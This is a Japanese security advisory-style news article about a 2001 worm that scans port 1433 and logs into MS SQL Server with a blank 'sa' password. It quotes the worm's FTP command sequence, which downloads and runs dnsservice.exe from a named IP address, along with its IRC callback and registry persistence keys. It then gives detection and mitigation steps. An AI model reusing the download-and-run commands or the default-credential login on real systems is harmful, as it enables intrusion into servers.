マイクロソフトSQLサーバーを狙ったワームが蔓延中 | ScanNetSecurity
2024.05.02(木)

マイクロソフトSQLサーバーを狙ったワームが蔓延中

概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無

国際 海外情報
facebookLINE
概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無し)で試みる。アプリケーションの多くがSQLサポートを使用している為、システム管理者が使用するIDとしてデフォルトが"sa"になっておりパスワードは設定されていない。

 ログオンに成功すると、ポート6669にあるbots.kujikiri.netのIRCサーバーに接続する。ワームがホストに到達すると、IRCチャンネルに"ホストが感染した"というメッセージを残す。次にIPアドレス207.29.192.160(フィラデルフィア美術館に関係したアドレス)にFTP接続し以下のコマンドを実行する。

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
start dnsservice.exe
close
quit

 上記の"ftp"はFTPアクセスに使用されたユーザ−名で" foo.com "は パスワードとして使用されている。感染したホストにdnsservice.exeをダウンロードし実行する仕掛けになっている。現段階ではこの実行ファイルによる影響は分っていない。

 更にコンピュータが起動する度にプログラムが走るようにレジストリに以下の3つのキーが書き加えられる。

SOFTWAREMicrosoftWindowsCurrentVersionRunTaskReg
SOFTWAREMicrosoftMSSQLServerClientSuperSocketNetLibProtocolOrder
SOFTWAREMicrosoftMSSQLServerClientConnectToDSQUERY


情報ソース:
Neohapis Archives (MS SQL HACKING, ), Nov. 13, 2000
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0094.html
incidents@securityfocus.com (Douglas P. Brown (dugbrown@email.unc.edu)), Nov. 20, 2001
BugTraq (Patrick Andry, pandry@wolverinefreight.ca), Nov. 20, 2001
BugTraq (Arthur Donkers, arthur@reseau.nl), Nov. 20, 2001
Incidents.org Oct. 04, 2001
http://www.incidents.org/diary/october01/100401.php#043
iDEFENSE Intelligence Operations, Nov. 20, 2001
iDEFENSE Labs, Nov. 20, 2001


分析:
 目的は不明だが、ワームは開いている1433TCPポートを走査している。このポートは通常、SQLサーバーを使用するProject 2000, Viso2000, Access 2000 及び Visual Studio 6.0が使用されている時に稼動する。

 SANS研究所によれば、最近、ポート1433の走査が盛んに行われたのは今年の10月上旬頃からとの報告がある。多くのスキャンは韓国発である事も確認されている。

 現時点ではアドレス207.29.192.160のFTPサーバー及び関連している実行ファイルの情報は入手出来ていないが、ワームの当バージョンは繁殖していない可能性もある。但し、将来、Ramenワームの様に新に感染したホストに自らのコピーをアップロード出来る亜種が発生する可能性もある。この様な亜種が発生すれば繁殖を抑える事は難しくなる。


検知方法:
 上記のレジストリがあれば感染している可能性がある。さらに Windows NT.4.0/2000では、システム管理者がMSSQLサーバーサービスが稼動していればコントロールパネルのサービスで確認する事ができる。IDS(侵入検知)で上記のテキスト文をftpセッション若しくはIRCとFTPに出て行くコネクションをモニターする事でワームを検知する事ができる。


暫定処置:
 コマンドプロンプトでnetstat -aのコマンドをかけて現在のポートの使用状況が確認できる。もし、TCP 1433ポートがあればSQLの機能と関連しているデフォルトのユーザ名、パスワードを変更する。また、TCP 1433ポートがインターネット接続に必要なポートでなければ、ルーター又はファイヤーウォールに当該ポートのingress/egressフィルタリング制限をかけると更に良い。


(詳しくはScan Daily EXpress本誌をご覧下さい)
http://vagabond.co.jp/vv/m-sdex.htm

※この情報はiDEFENSE社( http://www.idefense.co.jp/ )より提供いただいております。情報の内容は以下の時点におけるものです
【23:50 GMT、11、20、2001】

《ScanNetSecurity》

特集

PageTop

アクセスランキング

  1. ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

    ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

  2. クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

    クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

  3. 今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

    今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

  4. 2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

    2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

  5. クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

    クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

  6. 信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

    信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

  7. 雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

    雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

  8. 「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

    「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

  9. SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

    SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

  10. トレーニング 6 年ぶり復活 11/9 ~ 11/15「CODE BLUE 2024」開催

    トレーニング 6 年ぶり復活 11/9 ~ 11/15「CODE BLUE 2024」開催

ランキングをもっと見る
ホーム 国際 海外情報 記事
TOP